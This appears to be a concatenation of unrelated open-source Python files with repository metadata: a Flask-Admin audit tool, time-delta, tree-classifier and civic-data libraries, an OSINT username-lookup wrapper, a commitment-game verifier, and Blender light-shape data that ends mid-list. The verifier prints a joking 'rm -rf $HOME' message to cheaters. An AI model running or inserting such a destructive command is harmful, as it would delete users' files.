from flask import Blueprint from flask.ext.sqlalchemy import SQLAlchemy from flask.ext import admin from flask.ext.admin.contrib import sqla from flask.ext.admin import Admin, BaseView, expose from flask.ext.admin.base import MenuLink from flask.ext.admin.babel import gettext, ngettext, lazy_gettext from flask.ext.admin.form import Select2TagsWidget, Select2Field, Select2TagsField, rules from flask.ext.admin.actions import action from wtforms import validators, fields from app import app from app.database import db_session from app.models import AppType, App, AppBundle, Target, Organization, Department, Connection, Header, Tag from app.models import conn_tags_table class AppTypeAdmin(sqla.ModelView): list_template = "list.html" column_display_pk = False form_columns= ['desc'] class AppAdmin(sqla.ModelView): list_template = "list.html" column_display_pk = False # Allow only pre-defined values form_overrides = dict(severity=fields.SelectField) form_args = dict( severity = dict( choices = [('High', 'High'), ('Medium', 'Medium'), ('Low', 'Low')] )) form_columns = [ 'app_name', 'desc', 'app_type', 'bundle', 'version', 'environment', 'platform', 'department', 'contact', 'date_added', 'status', 'last_scan', 'reported_to_dpt', 'open_issues', 'severity', 'tags', 'url', 'comments' ] # Add here list of columns where to search column_searchable_list = ('desc', 'url', 'version', 'environment', 'platform', 'contact', AppBundle.name, Tag.name) # Define here filters column_filters = ('desc', 'app_name', 'department', 'app_type', 'url', 'app_id', 'version', 'environment', 'platform', 'date_added', 'tags', 'severity') # Define which fields should be preloaded by Ajax form_ajax_refs = { 'tags': { 'fields': (Tag.name,) }, 'app_type': { 'fields': (AppType.desc,) }, 'department': { 'fields': (Department.desc,) }, 'bundle': { 'fields': (AppBundle.name, AppBundle.desc,) } } # Group fields form_create_rules = [ rules.FieldSet(('app_name', 'desc', 'app_type', 'bundle', 'url', 'severity', 'tags', 'comments'), 'Application'), rules.FieldSet(('version', 'environment', 'platform', 'status'), 'Technical details'), rules.FieldSet(('contact', 'department'), 'Contact'), rules.FieldSet(('open_issues', 'last_scan', 'reported_to_dpt'), 'Audit details'), ] # Use same rule set for editing pages form_edit_rules = form_create_rules def __init__(self, session): # Just call parent class with predefined model super(AppAdmin, self).__init__(App, session) class AppBundleAdmin(sqla.ModelView): list_template = "list.html" class TargetAdmin(sqla.ModelView): list_template = "list.html" column_display_pk = False # Allow only pre-defined values form_overrides = dict(priority=fields.SelectField) form_args = dict( priority = dict( choices = [('High', 'High'), ('Medium', 'Medium'), ('Low', 'Low')] )) column_filters = ('scheme', 'user', 'password', 'netloc', 'port', 'path', 'params', 'query', 'fragment', 'priority', 'comments') column_searchable_list = ('scheme', 'user', 'password', 'netloc', 'path', 'params', 'query', 'fragment', 'priority', 'comments', Tag.name) form_ajax_refs = { 'tags': { 'fields': (Tag.name,) } } # Group fields form_create_rules = [ rules.FieldSet(('scheme', 'user', 'password', 'netloc', 'port', 'path', 'query', 'fragment'), 'URL Info'), rules.FieldSet(('priority', 'tags', 'comments', 'connection'), 'Audit details') ] # Use same rule set for editing pages form_edit_rules = form_create_rules @expose("/export") def action_export(self): return '<p>Not implemented yet</p>' @action('scan', 'Scan') def action_scan(self, ids): import json from utils.connection import send_request t = [] data = [] for id in ids: headers = [] target = db_session.query(Target).filter_by(id=id).one() t.append(target.to_string()) # Connect to target response = send_request(target.to_string(), t) # Collect headers for r in response.headers: headers.append({'header': r, 'value': response.headers[r]}) data.append({'id': id, 'data': headers}) return json.dumps(data, indent=2) def __init__(self, session): super(TargetAdmin, self).__init__(Target, session) class OrgAdmin(sqla.ModelView): # list_template = "list.html" column_display_pk = True class DepartmentAdmin(sqla.ModelView): list_template = "list.html" column_display_pk = False form_columns = ['org', 'desc', 'contact'] column_searchable_list = ('desc', Organization.desc) column_filters = ('desc', 'org') form_args = dict( text=dict(label='Big Text', validators=[validators.required()]) ) form_ajax_refs = { 'org': { 'fields': (Organization.desc,) } } def __init__(self, session): # Just call parent class with predefined model super(DepartmentAdmin, self).__init__(Department, session) class ConnectionAdmin(sqla.ModelView): list_template = "list.html" column_display_pk = False form_columns = ['conn_type', 'url', 'port', 'answer', 'redirect', 'tags'] column_searchable_list = ('conn_type', 'url', 'answer', 'redirect', 'ip', Tag.name) column_filters = ('conn_type', 'url', 'port', 'answer', 'redirect', 'ip', Tag.name) # Define which fields should be preloaded by Ajax form_ajax_refs = { 'tags': { 'fields': (Tag.name,) } } class HeaderAdmin(sqla.ModelView): list_template = "list.html" form_columns = ['conn_id', 'header', 'value'] # Add admin functionality admin = Admin(app, name="Admin App Survey", url="/admin", base_template="layout-admin.html", template_mode="bootstrap3") # Add models views admin.add_view(AppTypeAdmin(AppType, db_session)) admin.add_view(sqla.ModelView(Tag, db_session)) admin.add_view(AppAdmin(db_session)) admin.add_view(AppBundleAdmin(AppBundle, db_session)) admin.add_view(ConnectionAdmin(Connection, db_session)) admin.add_view(HeaderAdmin(Header, db_session)) admin.add_view(OrgAdmin(Organization, db_session)) admin.add_view(DepartmentAdmin(db_session)) admin.add_view(TargetAdmin(db_session))
mit
-3,902,489,461,993,599,500
31.487805
156
0.618018
false
3.661352
false
false
false
seppemans/businesstimedelta
businesstimedelta/businesstimedelta.py
1
2641
import datetime import pytz def localize_unlocalized_dt(dt): """Turn naive datetime objects into UTC. Don't do anything if the datetime object is aware. https://docs.python.org/3/library/datetime.html#datetime.timezone """ if dt.tzinfo is not None and dt.tzinfo.utcoffset(dt) is not None: return dt return pytz.utc.localize(dt) class BusinessTimeDelta(object): def __init__(self, rule, hours=0, seconds=0, timedelta=None): self.rule = rule if timedelta: self.timedelta = timedelta else: self.timedelta = datetime.timedelta( seconds=seconds, hours=hours) def __repr__(self): return '<BusinessTimeDelta %s hours %s seconds>' % (self.hours, self.seconds) def __eq__(self, other): return self.timedelta == other.timedelta def __add__(self, other): if isinstance(other, BusinessTimeDelta) and other.rule == self.rule: return BusinessTimeDelta(self.rule, timedelta=self.timedelta + other.timedelta) elif isinstance(other, datetime.datetime): dt = localize_unlocalized_dt(other) td_left = self.timedelta while True: period_start, period_end = self.rule.next(dt) period_delta = period_end - period_start # If we ran out of timedelta, return if period_delta >= td_left: return period_start + td_left td_left -= period_delta dt = period_end raise NotImplementedError def __radd__(self, other): return self.__add__(other) def __sub__(self, other): if isinstance(other, BusinessTimeDelta) and other.rule == self.rule: return BusinessTimeDelta(self.rule, timedelta=self.timedelta - other.timedelta) elif isinstance(other, datetime.datetime): dt = localize_unlocalized_dt(other) td_left = self.timedelta while True: period_start, period_end = self.rule.previous(dt) period_delta = period_end - period_start # If we ran out of timedelta, return if period_delta >= td_left: return period_end - td_left td_left -= period_delta dt = period_start def __rsub__(self, other): return self.__sub__(other) @property def hours(self): return int(self.timedelta.total_seconds() // (60 * 60)) @property def seconds(self): return int(self.timedelta.total_seconds() % (60 * 60))
mit
6,038,156,290,826,573,000
31.207317
91
0.581598
false
4.294309
false
false
false
flypy/flypy
flypy/runtime/lowlevel_impls.py
1
1431
# -*- coding: utf-8 -*- """ Low-level implementations of opaque methods. """ from __future__ import print_function, division, absolute_import import string from flypy.compiler import opaque from pykit import ir, types as ptypes def add_impl(opaque_func, name, implementation, restype=None, restype_func=None): """ Assign an implementation to an `opaque` function. Sets up a pykit function and calls `implementation` to produce the function body. """ def impl(py_func, argtypes): # TODO: do this better from flypy.compiler import representation_type ll_argtypes = [representation_type(x) for x in argtypes] argnames = list(string.ascii_letters[:len(argtypes)]) # Determine return type if restype_func: result_type = restype_func(argtypes) else: result_type = restype or ll_argtypes[0] type = ptypes.Function(result_type, tuple(ll_argtypes), False) func = ir.Function(name, argnames, type) func.new_block("entry") b = ir.Builder(func) b.position_at_beginning(func.startblock) implementation(b, argtypes, *func.args) return func opaque.implement_opaque(opaque_func, impl) def add_impl_cls(cls, name, implementation, restype=None, restype_func=None): opaque_func = getattr(cls, name) add_impl(opaque_func, name, implementation, restype, restype_func)
bsd-2-clause
8,591,202,777,185,511,000
29.446809
81
0.665968
false
3.795756
false
false
false
dmitru/pines
pines/estimators.py
1
4069
# coding=utf-8 import numpy as np from sklearn.base import BaseEstimator, ClassifierMixin, RegressorMixin from sklearn.utils import check_X_y, check_array from sklearn.utils.validation import NotFittedError from pines.tree_builders import TreeType, ProblemType class DecisionTreeClassifier(BaseEstimator, ClassifierMixin): def __init__(self, tree_type=TreeType.CART, **kwargs): """ Builds a decision tree for a classification problem. Args: tree_type (string): One of 'cart' or 'oblivious', default is 'cart' **kwargs: arguments to pass to a `TreeBuilder` instance Returns: self """ super(DecisionTreeClassifier, self).__init__() self.tree_ = None self.tree_type = tree_type self._tree_builder_kwargs = kwargs self._tree_builder_class = TreeType.get_tree_builder(tree_type) def fit(self, X, y, **kwargs): X, y = check_X_y(X, y, dtype=np.float64) data_size, n_features = X.shape self._n_features = n_features self._tree_builder = self._tree_builder_class( problem=ProblemType.CLASSIFICATION, **self._tree_builder_kwargs ) self.tree_ = self._tree_builder.build_tree(X, y) return self def predict(self, X, check_input=True): if check_input: X = self._validate_X_predict(X, check_input=True) return self.tree_.predict(X) def _validate_X_predict(self, X, check_input): """Validate X whenever one tries to predict, apply, predict_proba""" if self.tree_ is None: raise NotFittedError("Estimator not fitted, " "call `fit` before exploiting the model.") if check_input: X = check_array(X, dtype='f') n_features = X.shape[1] if self._n_features != n_features: raise ValueError("Number of features of the model must " " match the input. Model n_features is %s and " " input n_features is %s " % (self._n_features, n_features)) return X class DecisionTreeRegressor(BaseEstimator, RegressorMixin): def __init__(self, tree_type=TreeType.CART, **kwargs): """ Builds a decision tree for a classification problem. Args: tree_type (string): One of 'cart' or 'oblivious', default is 'cart' **kwargs: arguments to pass to a `TreeBuilder` instance Returns: self """ super(DecisionTreeRegressor, self).__init__() self._tree = None self.tree_type = tree_type self._tree_builder_kwargs = kwargs self._tree_builder_class = TreeType.get_tree_builder(tree_type) def fit(self, X, y, **kwargs): X, y = check_X_y(X, y, dtype=np.float64) data_size, n_features = X.shape self._n_features = n_features self._tree_builder = self._tree_builder_class( problem=ProblemType.REGRESSION, **self._tree_builder_kwargs ) self._tree = self._tree_builder.build_tree(X, y) return self def predict(self, X, check_input=True): if check_input: X = self._validate_X_predict(X, check_input=True) return self._tree.predict(X) def _validate_X_predict(self, X, check_input): """Validate X whenever one tries to predict, apply, predict_proba""" if self._tree is None: raise NotFittedError("Estimator not fitted, " "call `fit` before exploiting the model.") if check_input: X = check_array(X, dtype='f') n_features = X.shape[1] if self._n_features != n_features: raise ValueError("Number of features of the model must " " match the input. Model n_features is %s and " " input n_features is %s " % (self._n_features, n_features)) return X
mit
-3,523,422,632,452,845,000
35.00885
79
0.576554
false
3.958171
false
false
false
yeukhon/homework
computer-security/commitment/verifier.py
1
1699
#!/usr/bin/env python import sys import os from Crypto import Random from Crypto.Random import random as R import cPickle as pcl import hashlib as H # # # paper-rock-scissors over a line # # # # 1. wait for init message # 2. wait for commitment to one of the values # 3. send random choice in {paper,rock,scissors} # 4. wait for decommit value # 5. report results. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # items = {"paper": 0, "rock": 1, "scissors": 2} initMessage = pcl.load(sys.stdin) if initMessage != "hello": sys.stderr.write("You're supposed to say hello.\n") sys.exit() # say hello back. pcl.dump(initMessage,sys.stdout) sys.stdout.flush() # now wait for the committed value commitment = pcl.load(sys.stdin) # at this point it is safe to just report our value, # since we already have theirs. rnd = R.StrongRandom() item = dict.keys(items)[rnd.randint(0,len(items)-1)] pcl.dump(item,sys.stdout) sys.stdout.flush() # now read the decommit value decommit = pcl.load(sys.stdin) # this will be a list with the randomness first, # and the committed value second. theiritem = decommit[1] # make sure they aren't trying to cheat, and finally # report the results. h = H.sha512() h.update(decommit[0]) h.update(decommit[1]) if h.hexdigest() != commitment: message = "Cheater! You'll pay for that...\nrm -rf " \ + os.environ['HOME'] + "\nj/k hahahaha\n" elif items[item] == items[theiritem]: message = "I guess its's a draw.\n" elif (items[item] + 1) % 3 == items[theiritem]: message = "You lose. Hahahahaha\n" else: message = "You win.\n" pcl.dump(message,sys.stdout) sys.stderr.write(message) sys.stdout.flush() sys.exit()
mpl-2.0
-892,549,920,783,651,600
25.546875
67
0.664509
false
2.865093
false
false
false
i3visio/osrframework
osrframework/wrappers/reddit.py
1
3889
################################################################################ # # Copyright 2015-2020 Félix Brezo and Yaiza Rubio # # This program is part of OSRFramework. You can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ################################################################################ __author__ = "Felix Brezo, Yaiza Rubio <contacto@i3visio.com>" __version__ = "2.0" from osrframework.utils.platforms import Platform class Reddit(Platform): """A <Platform> object for Reddit""" def __init__(self): self.platformName = "Reddit" self.tags = ["forum"] ######################## # Defining valid modes # ######################## self.isValidMode = {} self.isValidMode["phonefy"] = False self.isValidMode["usufy"] = True self.isValidMode["searchfy"] = False ###################################### # Search URL for the different modes # ###################################### # Strings with the URL for each and every mode self.url = {} #self.url["phonefy"] = "http://anyurl.com//phone/" + "<phonefy>" self.url["usufy"] = "http://en.reddit.com/user/" + "<usufy>" #self.url["searchfy"] = "http://anyurl.com/search/" + "<searchfy>" ###################################### # Whether the user needs credentials # ###################################### self.needsCredentials = {} #self.needsCredentials["phonefy"] = False self.needsCredentials["usufy"] = False #self.needsCredentials["searchfy"] = False ################# # Valid queries # ################# # Strings that will imply that the query number is not appearing self.validQuery = {} # The regular expression '.+' will match any query #self.validQuery["phonefy"] = ".*" self.validQuery["usufy"] = ".+" #self.validQuery["searchfy"] = ".*" ################### # Not_found clues # ################### # Strings that will imply that the query number is not appearing self.notFoundText = {} #self.notFoundText["phonefy"] = [] self.notFoundText["usufy"] = ["<title>reddit.com: page not found</title>"] #self.notFoundText["searchfy"] = [] ######################### # Fields to be searched # ######################### self.fieldsRegExp = {} # Definition of regular expressions to be searched in phonefy mode #self.fieldsRegExp["phonefy"] = {} # Example of fields: #self.fieldsRegExp["phonefy"]["i3visio.location"] = "" # Definition of regular expressions to be searched in usufy mode self.fieldsRegExp["usufy"] = {} # Example of fields: #self.fieldsRegExp["usufy"]["i3visio.location"] = "" # Definition of regular expressions to be searched in searchfy mode #self.fieldsRegExp["searchfy"] = {} # Example of fields: #self.fieldsRegExp["searchfy"]["i3visio.location"] = "" ################ # Fields found # ################ # This attribute will be feeded when running the program. self.foundFields = {}
agpl-3.0
4,466,890,473,808,879,000
37.88
82
0.523405
false
4.358744
false
false
false
influence-usa/python-opencivicdata-django
opencivicdata/models/base.py
1
3359
import re import uuid from django.db import models from django.core.validators import RegexValidator from jsonfield import JSONField from uuidfield import UUIDField from .. import common class OCDIDField(models.CharField): def __init__(self, *args, **kwargs): self.ocd_type = kwargs.pop('ocd_type') if self.ocd_type != 'jurisdiction': kwargs['default'] = lambda: 'ocd-{}/{}'.format(self.ocd_type, uuid.uuid4()) # len('ocd-') + len(ocd_type) + len('/') + len(uuid) # = 4 + len(ocd_type) + 1 + 36 # = len(ocd_type) + 41 kwargs['max_length'] = 41 + len(self.ocd_type) regex = '^ocd-' + self.ocd_type + '/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$' else: kwargs['max_length'] = 300 regex = common.JURISDICTION_ID_REGEX kwargs['primary_key'] = True # get pattern property if it exists, otherwise just return the object (hopefully a string) msg = 'ID must match ' + getattr(regex, 'pattern', regex) kwargs['validators'] = [RegexValidator(regex=regex, message=msg, flags=re.U)] super(OCDIDField, self).__init__(*args, **kwargs) def deconstruct(self): name, path, args, kwargs = super(OCDIDField, self).deconstruct() if self.ocd_type != 'jurisdiction': kwargs.pop('default') kwargs.pop('max_length') kwargs.pop('primary_key') kwargs['ocd_type'] = self.ocd_type return (name, path, args, kwargs) class OCDBase(models.Model): """ common base fields across all top-level models """ created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) extras = JSONField(default='{}', blank=True) class Meta: abstract = True class RelatedBase(models.Model): id = UUIDField(auto=True, primary_key=True) class Meta: abstract = True class LinkBase(RelatedBase): note = models.CharField(max_length=300, blank=True) url = models.URLField(max_length=2000) class Meta: abstract = True class MimetypeLinkBase(RelatedBase): media_type = models.CharField(max_length=100) url = models.URLField(max_length=2000) class Meta: abstract = True class IdentifierBase(RelatedBase): identifier = models.CharField(max_length=300) scheme = models.CharField(max_length=300) class Meta: abstract = True class RelatedEntityBase(RelatedBase): name = models.CharField(max_length=2000) entity_type = models.CharField(max_length=20, blank=True) # optionally tied to an organization or person if it was linkable organization = models.ForeignKey('Organization', null=True) person = models.ForeignKey('Person', null=True) @property def entity_name(self): if self.entity_type == 'organization' and self.organization_id: return self.organization.name elif self.entity_type == 'person' and self.person_id: return self.person.name else: return self.name @property def entity_id(self): if self.entity_type == 'organization': return self.organization_id if self.entity_type == 'person': return self.person_id return None class Meta: abstract = True
bsd-3-clause
-3,939,492,258,956,639,000
29.816514
98
0.6234
false
3.687157
false
false
false
prman-pixar/RenderManForBlender
rman_ui/rman_ui_light_handlers/__init__.py
2
43288
import bpy import gpu from gpu_extras.batch import batch_for_shader from ...rfb_utils import transform_utils from ...rman_constants import RMAN_AREA_LIGHT_TYPES from .barn_light_filter_draw_helper import BarnLightFilterDrawHelper from mathutils import Vector, Matrix import mathutils import math _DRAW_HANDLER_ = None _BARN_LIGHT_DRAW_HELPER_ = None _PI0_5_ = 1.570796327 s_rmanLightLogo = dict() s_rmanLightLogo['box'] = [ (-0.5,0.5,0.0), (-0.5,-0.5,0.0), (0.5,-0.5,0.0), (0.5,0.5, 0.0) ] s_rmanLightLogo['point'] = [ (0.1739199623,0.2189011082,0.0), (0.2370826019,0.2241208805,0.0), (0.2889232079,0.180194478,0.0), (0.2945193948,0.1124769769,0.0), (0.2505929922,0.06063637093,0.0), (0.1828754911,0.05504018402,0.0), (0.1310348852,0.09896658655,0.0), (0.1254386983,0.1666840877,0.0) ] s_rmanLightLogo['bouncing_r'] = [ (0.10014534,0.163975795,0.0), (0.02377454715,0.2079409584,0.0), (-0.0409057802,0.162414633,0.0), (-0.09261710117,-0.03967857045,0.0), (-0.1033546419,-0.3941421577,0.0), (-0.1714205988,-0.3935548906,0.0), (-0.1743695606,-0.2185861014,0.0), (-0.1934162612,-0.001801638764,0.0), (-0.2387964527,0.228222199,0.0), (-0.2945193948,0.388358659,0.0), (-0.2800665961,0.3941421577,0.0), (-0.1944135703,0.2262313617,0.0), (-0.1480375743,0.08022936015,0.0), (-0.09632135301,0.2812304287,0.0), (0.03260773708,0.3415349284,0.0), (0.1794274591,0.2497892755,0.0), (0.10014534,0.163975795,0.0) ] s_rmanLightLogo['arrow'] = [ (0.03316599252,-6.536167e-18,0.0294362), (0.03316599252,-7.856030e-17,0.3538041), (0.06810822842,-7.856030e-17,0.3538041), (0,-1.11022302e-16,0.5), (-0.0681082284,-7.85603e-17,0.353804), (-0.0331659925,-7.85603e-17,0.353804), (-0.0331659925,-6.53616e-18,0.029436) ] s_rmanLightLogo['R_outside'] = [ [0.265400, -0.291600, 0.000000], [0.065400, -0.291600, 0.000000], [0.065400, -0.125000, 0.000000], [0.025800, -0.125000, 0.000000], [0.024100, -0.125000, 0.000000], [-0.084800, -0.291600, 0.000000], [-0.305400, -0.291600, 0.000000], [-0.170600, -0.093300, 0.000000], [-0.217900, -0.062800, 0.000000], [-0.254000, -0.023300, 0.000000], [-0.276900, 0.025800, 0.000000], [-0.284500, 0.085000, 0.000000], [-0.284500, 0.086700, 0.000000], [-0.281200, 0.128700, 0.000000], [-0.271200, 0.164900, 0.000000], [-0.254500, 0.196600, 0.000000], [-0.231000, 0.224900, 0.000000], [-0.195200, 0.252600, 0.000000], [-0.149600, 0.273700, 0.000000], [-0.092000, 0.287100, 0.000000], [-0.020300, 0.291600, 0.000000], [0.265400, 0.291600, 0.000000], [0.265400, -0.291600, 0.000000] ] s_rmanLightLogo['R_inside'] = [ [0.065400, 0.019100, 0.000000], [0.065400, 0.133300, 0.000000], [-0.014600, 0.133300, 0.000000], [-0.043500, 0.129800, 0.000000], [-0.065700, 0.119500, 0.000000], [-0.079800, 0.102100, 0.000000], [-0.084500, 0.077400, 0.000000], [-0.084500, 0.075700, 0.000000], [-0.079800, 0.052000, 0.000000], [-0.065700, 0.034100, 0.000000], [-0.043300, 0.022800, 0.000000], [-0.013800, 0.019100, 0.000000], [0.065400, 0.019100, 0.000000] ] s_envday = dict() s_envday['west_rr_shape'] = [ [-1.9994, 0, -0.1652], [-2.0337, 0, 0.0939], [-2.0376, 0, 0.1154], [-2.0458, 0, 0.1159], [-2.046, 0, 0.0952], [-2.0688, 0, -0.2033], [-2.1958, 0, -0.203], [-2.1458, 0, 0.1705], [-2.1408, 0, 0.1874], [-2.1281, 0, 0.2], [-2.1116, 0, 0.2059], [-2.0941, 0, 0.2078], [-1.9891, 0, 0.2073], [-1.9719, 0, 0.2039], [-1.9573, 0, 0.1938], [-1.9483, 0, 0.1786], [-1.9447, 0, 0.1613], [-1.9146, 0, -0.1149], [-1.9049, 0, -0.1127], [-1.8721, 0, 0.1759], [-1.8652, 0, 0.1921], [-1.8507, 0, 0.2021], [-1.8339, 0, 0.2072], [-1.7112, 0, 0.207], [-1.6943, 0, 0.2024], [-1.6816, 0, 0.1901], [-1.6744, 0, 0.1742], [-1.6234, 0, -0.2037], [-1.751, 0, -0.2035], [-1.7748, 0, 0.1153], [-1.7812, 0, 0.1166], [-1.7861, 0, 0.1043], [-1.8188, 0, -0.1565], [-1.8218, 0, -0.1738], [-1.83, 0, -0.1894], [-1.8447, 0, -0.1995], [-1.8618, 0, -0.2034], [-1.9493, 0, -0.2037], [-1.967, 0, -0.2024], [-1.9824, 0, -0.1956], [-1.9943, 0, -0.1825] ] s_envday['east_rr_shape'] = [ [1.8037, 0, 0.1094], [1.9542, 0, 0.1094], [1.9604, 0, 0.2004], [1.9175, 0, 0.2043], [1.8448, 0, 0.2069], [1.7493, 0, 0.2082], [1.7375, 0, 0.2079], [1.7258, 0, 0.2066], [1.7144, 0, 0.204], [1.7033, 0, 0.2], [1.6928, 0, 0.1947], [1.6831, 0, 0.188], [1.6743, 0, 0.1802], [1.6669, 0, 0.171], [1.6607, 0, 0.1611], [1.6559, 0, 0.1503], [1.6527, 0, 0.139], [1.6508, 0, 0.1274], [1.6502, 0, 0.1156], [1.6502, 0, -0.1122], [1.6505, 0, -0.1239], [1.6521, 0, -0.1356], [1.6551, 0, -0.147], [1.6597, 0, -0.1578], [1.6657, 0, -0.168], [1.6731, 0, -0.1771], [1.6816, 0, -0.1852], [1.6911, 0, -0.1922], [1.7014, 0, -0.1978], [1.7124, 0, -0.2021], [1.7238, 0, -0.205], [1.7354, 0, -0.2066], [1.7472, 0, -0.207], [1.8528, 0, -0.2058], [1.9177, 0, -0.2028], [1.9602, 0, -0.1993], [1.9541, 0, -0.1082], [1.8006, 0, -0.1084], [1.7892, 0, -0.1054], [1.7809, 0, -0.0968], [1.7789, 0, -0.0851], [1.7793, 0, -0.0471], [1.9329, 0, -0.0469], [1.933, 0, 0.0388], [1.7793, 0, 0.0384], [1.779, 0, 0.0895], [1.7825, 0, 0.1002], [1.792, 0, 0.1083] ] s_envday['south_rr_shape'] = [ [0.1585, 0, 1.654], [0.1251, 0, 1.6444], [0.0918, 0, 1.6383], [0.053, 0, 1.6345], [0.0091, 0, 1.6331], [-0.0346, 0, 1.6347], [-0.0712, 0, 1.6397], [-0.1002, 0, 1.6475], [-0.1221, 0, 1.6587], [-0.142, 0, 1.6791], [-0.1537, 0, 1.7034], [-0.1579, 0, 1.7244], [-0.1599, 0, 1.7458], [-0.1593, 0, 1.7672], [-0.1566, 0, 1.7884], [-0.1499, 0, 1.8088], [-0.1392, 0, 1.8273], [-0.1249, 0, 1.8433], [-0.1079, 0, 1.8563], [-0.0894, 0, 1.8675], [-0.0707, 0, 1.8765], [-0.0139, 0, 1.9013], [0.0258, 0, 1.9185], [0.041, 0, 1.9287], [0.0411, 0, 1.939], [0.0366, 0, 1.9485], [0.0253, 0, 1.9525], [-0.1485, 0, 1.95], [-0.1566, 0, 2.0398], [-0.1297, 0, 2.0462], [-0.0876, 0, 2.0538], [-0.0451, 0, 2.0585], [-0.0024, 0, 2.0603], [0.0403, 0, 2.0591], [0.0827, 0, 2.0534], [0.1231, 0, 2.0397], [0.1537, 0, 2.0102], [0.168, 0, 1.97], [0.1706, 0, 1.9273], [0.1631, 0, 1.8852], [0.1404, 0, 1.8491], [0.106, 0, 1.8236], [0.0875, 0, 1.8137], [-0.0136, 0, 1.7711], [-0.0244, 0, 1.7643], [-0.0309, 0, 1.7558], [-0.031, 0, 1.7462], [-0.0261, 0, 1.7393], [-0.0124, 0, 1.7353], [0.1505, 0, 1.7366] ] s_envday['north_rr_shape'] = [ [-0.144, 0, -2.034], [-0.1584, 0, -2.0323], [-0.1719, 0, -2.0256], [-0.1804, 0, -2.0136], [-0.1848, 0, -1.9996], [-0.185, 0, -1.9849], [-0.185, 0, -1.6235], [-0.0661, 0, -1.6236], [-0.0663, 0, -1.8158], [-0.0672, 0, -1.8303], [-0.0702, 0, -1.8594], [-0.0721, 0, -1.8739], [-0.0654, 0, -1.8569], [-0.048, 0, -1.8169], [-0.0415, 0, -1.8038], [0.0554, 0, -1.65], [0.0641, 0, -1.638], [0.0747, 0, -1.6286], [0.0869, 0, -1.6244], [0.0978, 0, -1.6235], [0.1541, 0, -1.6238], [0.1677, 0, -1.6263], [0.1811, 0, -1.6341], [0.1896, 0, -1.6477], [0.1926, 0, -1.6633], [0.1927, 0, -1.6662], [0.1927, 0, -2.0339], [0.0743, 0, -2.0341], [0.0743, 0, -1.8646], [0.0759, 0, -1.8354], [0.0786, 0, -1.8062], [0.0803, 0, -1.7917], [0.0735, 0, -1.8051], [0.0605, 0, -1.8312], [0.0473, 0, -1.8573], [0.0422, 0, -1.8659], [-0.0534, 0, -2.0154], [-0.0632, 0, -2.0261], [-0.0741, 0, -2.0322], [-0.0909, 0, -2.034] ] s_envday['inner_circle_rr_shape'] = [ [0, 0, -1], [-0.1961, 0, -0.9819], [-0.3822, 0, -0.9202], [-0.5587, 0, -0.8291], [-0.7071, 0, -0.707], [-0.8308, 0, -0.5588], [-0.9228, 0, -0.3822], [-0.9811, 0, -0.1961], [-1.0001, 0, 0], [-0.9811, 0, 0.1961], [-0.9228, 0, 0.3822], [-0.8361, 0, 0.5486], [-0.7071, 0, 0.7071], [-0.5587, 0, 0.8311], [-0.3822, 0, 0.9228], [-0.1961, 0, 0.9811], [0, 0, 1.0001], [0.1961, 0, 0.981], [0.3822, 0, 0.9228], [0.5587, 0, 0.8309], [0.7071, 0, 0.7071], [0.8282, 0, 0.5587], [0.9228, 0, 0.3822], [0.9811, 0, 0.1961], [1.0001, 0, 0], [0.9811, 0, -0.1961], [0.9228, 0, -0.3822], [0.831, 0, -0.5587], [0.7071, 0, -0.7071], [0.5587, 0, -0.8308], [0.3822, 0, -0.9228], [0.1961, 0, -0.981] ] s_envday['outer_circle_rr_shape'] = [ [0, 0, -1], [-0.1961, 0, -0.9815], [-0.3822, 0, -0.9202], [-0.5587, 0, -0.8288], [-0.7071, 0, -0.707], [-0.8282, 0, -0.5588], [-0.9228, 0, -0.3822], [-0.981, 0, -0.1961], [-1.0001, 0, 0], [-0.981, 0, 0.1961], [-0.9228, 0, 0.3822], [-0.8308, 0, 0.5538], [-0.7071, 0, 0.7071], [-0.5587, 0, 0.8302], [-0.3822, 0, 0.9228], [-0.1961, 0, 0.9811], [0, 0, 1.0001], [0.1961, 0, 0.981], [0.3822, 0, 0.9228], [0.5587, 0, 0.8279], [0.7071, 0, 0.7071], [0.8308, 0, 0.5587], [0.9228, 0, 0.3822], [0.981, 0, 0.1961], [1.0001, 0, 0], [0.981, 0, -0.1961], [0.9228, 0, -0.3822], [0.8308, 0, -0.5587], [0.7071, 0, -0.7071], [0.5587, 0, -0.8308], [0.3822, 0, -0.9228], [0.1961, 0, -0.9784] ] s_envday['compass_shape'] = [ [0, 0, -0.9746], [-0.2163, 0, -0.0012], [0, 0, 0.9721], [0.2162, 0, -0.0012], [0, 0, -0.9746] ] s_envday['east_arrow_shape'] = [ [1.2978, 0, -0.2175], [1.2978, 0, 0.215], [1.5141, 0, -0.0012], [1.2978, 0, -0.2175] ] s_envday['south_arrow_shape'] = [ [-0.2163, 0, 1.2965], [0.2162, 0, 1.2965], [0, 0, 1.5128], [-0.2163, 0, 1.2965] ] s_envday['west_arrow_shape'] = [ [-1.2979, 0, -0.2175], [-1.2979, 0, 0.215], [-1.5142, 0, -0.0012], [-1.2979, 0, -0.2175] ] s_envday['north_arrow_shape'] = [ [-0.2163, 0, -1.2991], [0.2162, 0, -1.2991], [0, 0, -1.5154], [-0.2163, 0, -1.2991] ] s_diskLight = [ [0.490300, 0.097500, 0.000000], [0.461900, 0.191300, 0.000000], [0.415700, 0.277700, 0.000000], [0.353500, 0.353500, 0.000000], [0.277700, 0.415700, 0.000000], [0.191300, 0.461900, 0.000000], [0.097500, 0.490300, 0.000000], [0.000000, 0.499900, 0.000000], [-0.097500, 0.490300, 0.000000], [-0.191300, 0.461900, 0.000000], [-0.277700, 0.415700, 0.000000], [-0.353500, 0.353500, 0.000000], [-0.415700, 0.277700, 0.000000], [-0.461900, 0.191300, 0.000000], [-0.490300, 0.097500, 0.000000], [-0.499900, 0.000000, 0.000000], [-0.490300, -0.097500, 0.000000], [-0.461900, -0.191300, 0.000000], [-0.415700, -0.277700, 0.000000], [-0.353500, -0.353500, 0.000000], [-0.277700, -0.415700, 0.000000], [-0.191300, -0.461900, 0.000000], [-0.097500, -0.490300, 0.000000], [0.000000, -0.499900, 0.000000], 